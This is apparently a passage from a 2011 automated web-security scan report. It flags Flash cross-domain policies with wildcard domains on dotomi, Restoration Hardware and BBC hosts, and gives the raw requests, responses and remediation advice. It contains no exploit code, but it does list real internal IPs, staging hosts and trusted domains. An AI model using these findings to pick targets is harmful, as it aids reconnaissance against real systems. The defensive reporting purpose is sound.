<allow-access-from domain="*.whitneyenglish.com"/>
<allow-access-from domain="canadiantire.ca"/>
<allow-access-from domain="*.maxnow.com"/>
<allow-access-from domain="4.59.112.158"/>
<allow-access-from domain="*.nike.com"/>
<allow-access-from domain="*.converse.com" secure="false" />
...[SNIP]...
<allow-access-from domain="converse.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.converse.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="converse.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cust.aops-eds.com"/>
<allow-access-from domain="*.colehaan.com"/>
<allow-access-from domain="kobe.nike.jess3.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.highschoolsports.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.kb24.com" secure="false" />
...[SNIP]...
<allow-access-from domain="kb24.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.skysports.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lequipe.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="converse.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.staging.groundctrl.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="staging.groundctrl.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="siteinnovation.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="siteinnovationdev.digitas.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ny.rga.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nikedev.framfab.dk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.akqa.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ostkcdn.com"/>
<allow-access-from domain="*.aggregateknowledge.com"/>
<allow-access-from domain="*.nikedev.com"/>
<allow-access-from domain="anthrode.uat.venda.com"/>
<allow-access-from domain="anthropologie.custqa.venda.com"/>
<allow-access-from domain="*.fingerhut.com"/>
<allow-access-from domain="*.gettington.com"/>
...[SNIP]...

6.63. http://login.dotomi.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://login.dotomi.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: login.dotomi.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:04 GMT
Server: Apache
X-Name: dmc-o01
Set-Cookie: Apache=173.193.214.243.1305510844202398; path=/
Last-Modified: Tue, 23 Nov 2010 00:49:00 GMT
ETag: "3500060-a1-495adbd05d700"
Accept-Ranges: bytes
Content-Length: 161
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://*.dotomi.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.dotomi.com" />
</cross-domain-policy>

6.64. http://media.restorationhardware.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://media.restorationhardware.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.restorationhardware.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Expires: Mon, 16 May 2011 11:53:22 GMT
Accept-Ranges: bytes
ETag: W/"25343-1305036218000"
Last-Modified: Tue, 10 May 2011 14:03:38 GMT
Content-Type: application/xml
Content-Length: 25343
Date: Mon, 16 May 2011 01:53:22 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.laneventure.com"/>
<allow-access-from domain="*.pearsonco.com"/>
<allow-access-from domain="*.targetimg1.com"/>
<allow-access-from domain="*.targetimg2.com"/>
<allow-access-from domain="*.targetimg3.com"/>
<allow-access-from domain="*.agilent.com"/>
<allow-access-from domain="*.artvan.com"/>
<allow-access-from domain="*.mizunogolf.com"/>
<allow-access-from domain="*.talbots.com"/>
<allow-access-from domain="giftadvisor.indelible.tv"/>
<allow-access-from domain="*.taaz.com"/>
<allow-access-from domain="www.flashmaxx.com"/>
<allow-access-from domain="flashmaxx.com"/>
<allow-access-from domain="searsfb.indelible.tv"/>
<allow-access-from domain="*.armstrong.com"/>
<allow-access-from domain="ag2010.stage.ascedia.com"/>
<allow-access-from domain="sassomedia.com"/>
<allow-access-from domain="*.photoshop.com"/>
<allow-access-from domain="kijones.host.adobe.com"/>
<allow-access-from domain="ag2010.stage.ascedia.com"/>
<allow-access-from domain="*.trex.com"/>
<allow-access-from domain="*.trexco.com"/>
<allow-access-from domain="*.vermontcountrystore.com"/>
<allow-access-from domain="*.pabng.com"/>
<allow-access-from domain="s7sps3.scene7.com"/>
<allow-access-from domain="*.morrowsnowboards.com"/>
<allow-access-from domain="*.k2admin.com"/>
<allow-access-from domain="*.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.shopdeluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.nimblefish.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fossil.com"/>
<allow-access-from domain="www.michele.com"/>
<allow-access-from domain="127.0.0.1" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.polarisindustries.com"/>
<allow-access-from domain="backstage.polarisindustries.com"/>
<allow-access-from domain="s7diod-isorigin.scene7.com"/>
<allow-access-from domain="origin-na1.scene7.com"/>
<allow-access-from domain="origin-na2.scene7.com"/>
<allow-access-from domain="origin-na3.scene7.com"/>
<allow-access-from domain="origin-na4.scene7.com"/>
<allow-access-from domain="origin-na5.scene7.com"/>
<allow-access-from domain="origin-na6.scene7.com"/>
<allow-access-from domain="origin-na7.scene7.com"/>
<allow-access-from domain="origin-na8.scene7.com"/>
<allow-access-from domain="s7d1.scene7.com"/>
<allow-access-from domain="s7d2.scene7.com"/>
<allow-access-from domain="s7d3.scene7.com"/>
<allow-access-from domain="s7d4.scene7.com"/>
<allow-access-from domain="s7ondemand1.scene7.com"/>
<allow-access-from domain="irtex1.scene7.com"/>
<allow-access-from domain="10.80.1.144"/>
<allow-access-from domain="10.80.1.152"/>
<allow-access-from domain="10.80.1.42"/>
<allow-access-from domain="origin-apps.scene7.com"/>
<allow-access-from domain="s7ondemand1-apps.scene7.com"/>
<allow-access-from domain="isstaging.scene7.com"/>
<allow-access-from domain="techservices.scene7.com"/>
<allow-access-from domain="ecomtest1.hancockms.com"/>
<allow-access-from domain="www.hancockfabrics.com"/>
<allow-access-from domain="www.eddiebauer.com"/>
<allow-access-from domain="dev.eddiebauer.com"/>
<allow-access-from domain="qa.eddiebauer.com"/>
<allow-access-from domain="testvipd1.scene7.com"/>
<allow-access-from domain="testvipd2.scene7.com"/>
<allow-access-from domain="testvipd3.scene7.com"/>
<allow-access-from domain="testvipd4.scene7.com"/>
<allow-access-from domain="s7ondemand3.scene7.com"/>
<allow-access-from domain="s7ondemand7.scene7.com"/>
<allow-access-from domain="s7ips1.scene7.com"/>
<allow-access-from domain="s7ondemand5.scene7.com"/>
<allow-access-from domain="*.sample.scene7.com"/>
<allow-access-from domain="origin-search.scene7.com"/>
<allow-access-from domain="staging.scene7.com"/>
<allow-access-from domain="s7testis.adobe.com"/>
<allow-access-from domain="sportstown.crosscomm.net"/>
<allow-access-from domain="sportstown.com"/>
<allow-access-from domain="*.sportstown.com"/>
<allow-access-from domain="www.anthropologie.com"/>
<allow-access-from domain="staging.anthropologie.us"/>
<allow-access-from domain="smartwool.dev.summitprojects.com"/>
<allow-access-from domain="smartwool.stage.summitprojects.com"/>
<allow-access-from domain="www.smartwool.com"/>
<allow-access-from domain="s7d5.scene7.com"/>
<allow-access-from domain="testvipd5.scene7.com"/>
<allow-access-from domain="www.roadrunnersports.com"/>
<allow-access-from domain="dev.atgnow.com"/>
<allow-access-from domain="staging.roadrunnersports.com"/>
<allow-access-from domain="*.sportstown.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="sportstown.com" secure="true"/>
...[SNIP]...
<allow-access-from domain=" s7.sears.com "/>
<allow-access-from domain="*.myctmh.com"/>
<allow-access-from domain="*.burton.com"/>
<allow-access-from domain="*.instrum3nt.com"/>
<allow-access-from domain="*.tommybahama.com"/>
<allow-access-from domain="demo.ml.nurun.com"/>
<allow-access-from domain="trek07.hansondodge.com"/>
<allow-access-from domain="*.dexdealer.com" />
<allow-access-from domain="*.bontrager.com" />
<allow-access-from domain="*.trekbikes.com" />
<allow-access-from domain="*.readyfortheroadahead.com" />
<allow-access-from domain="*.belk.com"/>
<allow-access-from domain="*.sears.com"/>
<allow-access-from domain="*.dayport.com"/>
<allow-access-from domain="eaqa2prod1234.ethanallen.com"/>
<allow-access-from domain="devaws.ethanallen.com"/>
<allow-access-from domain="elm.kharv.com"/>
<allow-access-from domain="serotoninsoftware.com"/>
<allow-access-from domain="*.ethanallen.com"/>
<allow-access-from domain="*.wishbook.com"/>
<allow-access-from domain="*.entriq.net"/>
<allow-access-from domain="test-web1-www.lbiatlanta.com"/>
<allow-access-from domain="*.newellco.com"/>
<allow-access-from domain="preview.graco.com"/>
<allow-access-from domain="*.gracobaby.com"/>
<allow-access-from domain="s.sears.com"/>
<allow-access-from domain="202.44.56.2"/>
<allow-access-from domain="202.44.58.2"/>
<allow-access-from domain="beta.graco.com"/>
<allow-access-from domain="*.burton.com"/>
<allow-access-from domain="*.ashleyfurniture.com" />
<allow-access-from domain="*.ashleyfurniturehomestore.com" />
<allow-access-from domain="s7sps1-staging.scene7.com" />
<allow-access-from domain="s7sps1.scene7.com" />
<allow-access-from domain="*.lokion.com"/>
<allow-access-from domain="*.vikingrange.com"/>
<allow-access-from domain="www.armstrong.com"/>
<allow-access-from domain="*.classscene.com"/>
<allow-access-from domain="*.classsceneqa.com"/>
<allow-access-from domain="*.classscenedemo.com"/>
<allow-access-from domain="*.fulltiltboots.com"/>
<allow-access-from domain="*.ridesnowboards.com"/>
<allow-access-from domain="*.karhuskico.com"/>
<allow-access-from domain="*.k2women.com"/>
<allow-access-from domain="*.k2snowboarding.com"/>
<allow-access-from domain="*.k2skis.com"/>
<allow-access-from domain="*.ridesnowboards.com"/>
<allow-access-from domain="*.lineskis.com"/>
<allow-access-from domain="*.5150snowboarding.com"/>
<allow-access-from domain="*.morrowsnowboards.com"/>
<allow-access-from domain="*.atlassnowshoe.com"/>
<allow-access-from domain="*.tubbssnowshoes.com"/>
<allow-access-from domain="*.k2telemark.com"/>
<allow-access-from domain="*.k2dealertools.com"/>
<allow-access-from domain="*.planet-earth-clothing.com"/>
<allow-access-from domain="*.k2skates.com"/>
<allow-access-from domain="*.k2iceskates.com"/>
<allow-access-from domain="*.snowshoes.com"/>
<allow-access-from domain="*.vashonstorefront.com"/>
<allow-access-from domain="*.adiofootwear.com"/>
<allow-access-from domain="*.adio.com"/>
<allow-access-from domain="4.59.112.138"/>
<allow-access-from domain="store.americangirl.com"/>
<allow-access-from domain="*.store.americangirl.com"/>
<allow-access-from domain="agpmt-prod:7778"/>
<allow-access-from domain="agpmt-test:7777"/>
<allow-access-from domain="s7demo.host.adobe.com"/>
<allow-access-from domain="*.jcpenney.com"/>
<allow-access-from domain="*.teamzonesports.com"/>
<allow-access-from domain="*.underarmour.com"/>
<allow-access-from domain="broadridge.mominc.com"/>
<allow-access-from domain="*.craftsman.com"/>
<allow-access-from domain="*.sothebys.com"/>
<allow-access-from domain="*.facebook.com"/>
<allow-access-from domain="*.thuzi.com"/>
<allow-access-from domain="*.samsclub.com"/>
<allow-access-from domain="161.169.79.10"/>
<allow-access-from domain="store.americangirl.com"/>
<allow-access-from domain="*.hansondodge.com"/>
<allow-access-from domain="*.thebrick.com"/>
<allow-access-from domain="s7demo.scene7.com"/>
<allow-access-from domain="*.richrelevance.com"/>
<allow-access-from domain="*.hit.homedepot.resource.com"/>
<allow-access-from domain="*.allurent.net"/>
<allow-access-from domain="*.ashro.com"/>
<allow-access-from domain="*.countrydoor.com"/>
<allow-access-from domain="*.ginnys.com"/>
<allow-access-from domain="*.grandpointe.com"/>
<allow-access-from domain="*.monroeandmain.com"/>
<allow-access-from domain="*.midnightvelvet.com"/>
<allow-access-from domain="*.raceteamgear.com"/>
<allow-access-from domain="*.swisscolony.com"/>
<allow-access-from domain="*.seventhavenue.com"/>
<allow-access-from domain="*.homevisions.com"/>
<allow-access-from domain="*.wards.com"/>
<allow-access-from domain="*.tenderfilet.com"/>
<allow-access-from domain="assets.k2sports.com"/>
<allow-access-from domain="assets.ridesnowboards.com"/>
<allow-access-from domain="assets1.k2sports.com"/>
<allow-access-from domain="assets1.ridesnowboards.com"/>
<allow-access-from domain="assets2.k2sports.com"/>
<allow-access-from domain="assets2.ridesnowboards.com"/>
<allow-access-from domain="161.211.2.28"/>
<allow-access-from domain="161.211.155.7"/>
<allow-access-from domain="ah-stg.fry.com"/>
<allow-access-from domain="cd-stg.fry.com"/>
<allow-access-from domain="gn-stg.fry.com"/>
<allow-access-from domain="gp-stg.fry.com"/>
<allow-access-from domain="hv-stg.fry.com"/>
<allow-access-from domain="mm-stg.fry.com"/>
<allow-access-from domain="mv-stg.fry.com"/>
<allow-access-from domain="mw-stg.fry.com"/>
<allow-access-from domain="rt-stg.fry.com"/>
<allow-access-from domain="rc-stg.fry.com"/>
<allow-access-from domain="tf-stg.fry.com"/>
<allow-access-from domain="sc-stg.fry.com"/>
<allow-access-from domain="sa-stg.fry.com"/>
<allow-access-from domain="shopdeluxe-v9-dev.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="shopdeluxe-v9-uat.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="stage.coach.com"/>
<allow-access-from domain="*.coach.com"/>
<allow-access-from domain="demandware.edgesuite.net"/>
<allow-access-from domain="*.buildabear.com"/>
<allow-access-from domain="*.babwtest.com"/>
<allow-access-from domain="customshop.mesfire.com"/>
<allow-access-from domain="stage.homeinspiration.homedepot.com "/>
<allow-access-from domain="homeinspiration.homedepot.com"/>
<allow-access-from domain="pointroll.com"/>
<allow-access-from domain="*.pointroll.com"/>
<allow-access-from domain="*.smartwool.com"/>
<allow-access-from domain="*.summitprojects.com"/>
<allow-access-from domain="*.nike.com"/>
<allow-access-from domain="511.niteviewtech.com"/>
<allow-access-from domain="www.lauramercier.com"/>
<allow-access-from domain="*.lumberliquidators.com"/>
<allow-access-from domain="*.ae.com"/>
<allow-access-from domain="*.aezone.com"/>
<allow-access-from domain="s7everest.macromedia.com"/>
<allow-access-from domain="s7fuji.macromedia.com"/>
<allow-access-from domain="s7qa-is.macromedia.com"/>
<allow-access-from domain="officemax.companychecksandforms.com"/>
<allow-access-from domain="www.511deasbf.com"/>
<allow-access-from domain="*.511deasbf.com"/>
<allow-access-from domain="*.vcfcorp.com"/>
...[SNIP]...
<allow-access-from domain="*.asfurniture.com"/>
<allow-access-from domain="*.vcf.com"/>
...[SNIP]...
<allow-access-from domain="anthropologie.uat.venda.com"/>
<allow-access-from domain="anthropologie.live.venda.com"/>
<allow-access-from domain="*.511academy.com"/>
<allow-access-from domain="*.reedkrakoff.com"/>
<allow-access-from domain="stage.wearport.com"/>
<allow-access-from domain="*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.anthropologie.eu"/>
<allow-access-from domain="s7demo.host.adobe.com"/>
<allow-access-from domain="www.leadbased.com"/>
<allow-access-from domain="*.mxbi.com"/>
<allow-access-from domain="*.jordans.com"/>
<allow-access-from domain="jordans.com"/>
<allow-access-from domain="jordansqa.weymouthdesign.com"/>
<allow-access-from domain="*.mercury.com"/>
<allow-access-from domain="*.cb2.com"/>
<allow-access-from domain="*.landofnod.com"/>
<allow-access-from domain="*.crateandbarrel.com"/>
<allow-access-from domain="*.crateandbarrel.ca"/>
<allow-access-from domain="cim-dev.deluxe.com"/>
<allow-access-from domain="cim-qa.deluxe.com"/>
<allow-access-from domain="www.deluxe-check-order.com"/>
<allow-access-from domain="wwwpreprod.deluxe-check-order.com"/>
<allow-access-from domain="*.vfimagewear.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.zumiez.com"/>
<allow-access-from domain="zumiez.com"/>
<allow-access-from domain="*.vfc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="service-apps.scene7.com"/>
<allow-access-from domain="service-apps-staging.scene7.com"/>
<allow-access-from domain="walmart.scene7.com"/>
<allow-access-from domain="s7ondemand1-apps-staging.scene7.com"/>
<allow-access-from domain="63.241.188.118"/>
<allow-access-from domain="63.241.188.119"/>
<allow-access-from domain="63.241.188.116"/>
<allow-access-from domain="63.241.188.120"/>
<allow-access-from domain="63.241.188.121"/>
<allow-access-from domain="63.241.188.117"/>
<allow-access-from domain="63.241.188.122"/>
<allow-access-from domain="63.241.188.123"/>
<allow-access-from domain="63.241.188.124"/>
<allow-access-from domain="63.241.188.125"/>
<allow-access-from domain="stage.store.americangirl.com"/>
<allow-access-from domain="*.kohls.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="media.kohls.com.edgesuite.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.edgeboss.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlscorporation.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlscareers.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlsoncampus.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.apiservice.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="98.129.79.154" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="httpCDN.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="rtmpCDN.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mixercast.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fluid.com"/>
<allow-access-from domain="*.enlighten.com"/>
<allow-access-from domain="*.hunterdouglas.com"/>
<allow-access-from domain=".allurent.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="64.52.70.13"/>
<allow-access-from domain="64.52.70.30"/>
<allow-access-from domain="64.52.70.33"/>
<allow-access-from domain="64.52.70.60"/>
<allow-access-from domain="76.12.61.174"/>
<allow-access-from domain="*.kmart.com"/>
<allow-access-from domain="skavamp.com"/>
<allow-access-from domain="*.skavamp.com"/>
<allow-access-from domain="*.cloudfront.net"/>
<allow-access-from domain="www.grandinroad.com"/>
<allow-access-from domain="www.frontgate.com"/>
<allow-access-from domain="97.65.222.116"/>
<allow-access-from domain="97.65.222.115"/>
<allow-access-from domain="*.neptune.com"/>
<allow-access-from domain="*.colehaan.com"/>
<allow-access-from domain="*.web.rga.com"/>
<allow-access-from domain="*.ny.rga.com"/>
<allow-access-from domain="content01.nimblefish.com"/>
<allow-access-from domain="cdn.nimblefish.com"/>
<allow-access-from domain="media.nimblefish.com"/>
<allow-access-from domain="nv.nimblefish.com"/>
<allow-access-from domain="app.nimblefish.com"/>
<allow-access-from domain="media.beta01.nimblefish.com"/>
<allow-access-from domain="nv.beta01.nimblefish.com"/>
<allow-access-from domain="app.beta01.nimblefish.com"/>
<allow-access-from domain="media.content01.nimblefish.com"/>
<allow-access-from domain="nv.content01.nimblefish.com"/>
<allow-access-from domain="app.content01.nimblefish.com"/>
<allow-access-from domain="*.511fbileeda.com"/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="*.theodorealexander.com"/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="*.theodorealexander.com"/>
<allow-access-from domain="*.hottopic.com"/>
<allow-access-from domain="*.teamworkathletic.com "/>
<allow-access-from domain="*.scene7.com"/>
<allow-access-from domain="*.shopvcf.com"/>
<allow-access-from domain="shopvcf.com"/>
<allow-access-from domain="*.axelscript.com"/>
<allow-access-from domain="*.sherwin.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.sherwin-williams.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.resource.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*flashmaxx.com"/>
<allow-access-from domain="searsfb.indelible.tv"/>
<allow-access-from domain="*.serving-sys.com"/>
<allow-access-from domain="*.modea.com"/>
<allow-access-from domain="*.mizunousa.com"/>
<allow-access-from domain="*.mizunorunning.com"/>
<allow-access-from domain="*.mizunocda.com"/>
<allow-access-from domain="*.footjoy.com"/>
<allow-access-from domain="*.footjoy.co.uk"/>
<allow-access-from domain="*.footjoy.com.fr"/>
<allow-access-from domain="*.footjoy.de"/>
<allow-access-from domain="*.footjoy.se"/>
<allow-access-from domain="*.footjoy.ca"/>
<allow-access-from domain="*.footjoy.com.au"/>
<allow-access-from domain="*.footjoy.jp"/>
<allow-access-from domain="*.footjoy.co.th"/>
<allow-access-from domain="*.footjoy.com.my"/>
<allow-access-from domain="*.footjoy.com.sg"/>
<allow-access-from domain="*.footjoy.co.kr"/>
<allow-access-from domain="*.footjoy.com.cn"/>
<allow-access-from domain="pitchinteractive.com"/>
<allow-access-from domain="*.indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="flashmaxx.com" secure="true" />
...[SNIP]...
<allow-access-from domain="searsfb.indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="ec2-184-72-166-175.compute-1.amazonaws.com"/>
<allow-access-from domain="*.getpapered.com"/>
<allow-access-from domain="*.englishpapercompany.com"/>
<allow-access-from domain="*.koolsquare.net"/>
<allow-access-from domain="*.target.com"/>
<allow-access-from domain="*.home.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cos.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.lvld.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="cp.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.at" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.be" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ca" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ch" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.cl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.hu" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.il" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.in" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.jp" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.kr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.nz" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.th" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.uk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ar" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.br" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.cn" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.co" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.hk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.mx" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.my" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pe" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ph" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ru" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.sg" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.tr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.tw" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ve" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.cz" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.de" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.dk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ee" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.es" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.fi" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.fr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.gr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ie" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.it" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.lu" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.nl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.no" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.pt" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ru" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.se" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.us" secure="true" />
...[SNIP]...
<allow-access-from domain="*.brooksbrothers.com"/>
<allow-access-from domain="*.whitneyenglish.com"/>
<allow-access-from domain="canadiantire.ca"/>
<allow-access-from domain="*.maxnow.com"/>
<allow-access-from domain="4.59.112.158"/>
<allow-access-from domain="*.nike.com"/>
<allow-access-from domain="*.converse.com" secure="false" />
...[SNIP]...
<allow-access-from domain="converse.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.converse.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="converse.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cust.aops-eds.com"/>
<allow-access-from domain="*.colehaan.com"/>
<allow-access-from domain="kobe.nike.jess3.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.highschoolsports.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.kb24.com" secure="false" />
...[SNIP]...
<allow-access-from domain="kb24.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.skysports.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lequipe.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="converse.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.staging.groundctrl.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="staging.groundctrl.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="siteinnovation.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="siteinnovationdev.digitas.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ny.rga.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nikedev.framfab.dk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.akqa.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ostkcdn.com"/>
<allow-access-from domain="*.aggregateknowledge.com"/>
<allow-access-from domain="*.nikedev.com"/>
<allow-access-from domain="anthrode.uat.venda.com"/>
<allow-access-from domain="anthropologie.custqa.venda.com"/>
<allow-access-from domain="*.fingerhut.com"/>
<allow-access-from domain="*.gettington.com"/>
...[SNIP]...

6.65. http://newsrss.bbc.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy that trusts several wildcard patterns (*.bbc.co.uk, *.bbci.co.uk, *.bbc.com, *.bbcamerica.com) alongside a long list of named hosts and subdomains.

Using a wildcard means that any host matching the pattern, now or in the future, can perform two-way interaction with this application from a Flash object, with the victim's browser cookies for newsrss.bbc.co.uk attached. That includes internal-looking names that appear in the same file, such as nolpreview11.newsonline.tc.nca.bbc.co.uk and dc01.dc.bbc.co.uk. You should only use this policy if you fully trust every web site that can be hosted under those patterns.

Allowing access from specific named domains grants the same two-way access to those hosts only, and should likewise be limited to hosts you fully trust. The policy is served over plain http, so the secure attribute does not apply here. The host name suggests it serves public RSS feeds, which limits what an attacker could read through it; confirm that nothing authenticated is served from the same host.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Mon, 16 May 2011 10:43:05 GMT
Date: Mon, 16 May 2011 10:41:05 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
